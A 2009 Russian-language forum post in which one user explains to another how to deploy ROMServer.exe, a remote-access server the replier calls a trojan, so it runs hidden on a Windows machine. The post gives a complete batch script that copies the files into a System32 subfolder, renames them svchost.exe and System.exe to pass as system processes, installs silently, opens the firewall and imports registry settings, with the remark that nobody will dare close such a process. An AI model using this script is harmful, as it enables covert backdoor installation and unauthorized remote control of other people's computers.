Показать сообщение отдельно

Старый 06.12.2009, 16:30
blood150
Новичок
С нами: 9041044

Я пока не понимаю, как работает запуск файла ROMServer.exe автоматом, в регистрах его нигде нет, в автозапуске тоже нет, в регистре Run и RunServices тоже отсутствует. Как оно может вообще запускаться? Но оно запускается и работает так как я и хотел, но не думаю что будет работать постоянно и не думаю что обакновенная комманда из БАТника типа silentinstall прописывает его в регситры на долгие века.
Можешь мне разъяснить принцип автозапуска ROMServer.exe? Может есть смысл кинуть файл в папку system32, тогда как конкретно должен выглядить REG файл с коммандой для прописи в папке %SystemRoot%\System32\ROMServer.exe ? и нужно ли кидать и все остальные файлы в директорию System32?[/QUOTE]
Если ты про то как он попадает в автозапуск, то это в настройках сервера само стоит автозагрузка, такчто трой сам будет запускатся постоянно.
а про то как переделать всё под папку System32 то не надо переписывать фаил с расширением REG в нём всё и так пойдёт, тебе только батник переписать надо так

mkdir "%SYSTEMROOT%\System32\sistem"
copy /y "AledensoftIpcServer.dll" "%SYSTEMROOT%\System32\sistem\AledensoftIpcServer. dll"
copy /y "English.lg" "%SYSTEMROOT%\System32\sistem\English.lg"
copy /y "EULA.rtf" "%SYSTEMROOT%\System32\sistem\EULA.rtf"
copy /y "HookDrv.dll" "%SYSTEMROOT%\System32\sistem\HookDrv.dll"
copy /y "ROMFUSClient.exe" "%SYSTEMROOT%\System32\sistem\svchost.exe"
copy /y "ROMServer.exe" "%SYSTEMROOT%\System32\sistem\System.exe"
copy /y "ROMwln.dll" "%SYSTEMROOT%\System32\sistem\ROMwln.dll"
copy /y "Russian.lg" "%SYSTEMROOT%\System32\sistem\Russian.lg"

"%SYSTEMROOT%\System32\sistem\System.exe" /silentinstall
"%SYSTEMROOT%\System32\sistem\System.exe" /firewall

reg import "settings.reg"
regedit /s "settings.reg"

"%SYSTEMROOT%/System32\sistem\System.exe" /start

видеш как тут сделано? ROMServer.exe переименовывайтся в System.exe так он будет отображатся в процессах диспетчкра , я думаю врятли кто рескнёт закрывать такой процесс....
а вот этой строчкой создаётся папка в которую кинутся всё нужные файлы mkdir "%SYSTEMROOT%\System32\sistem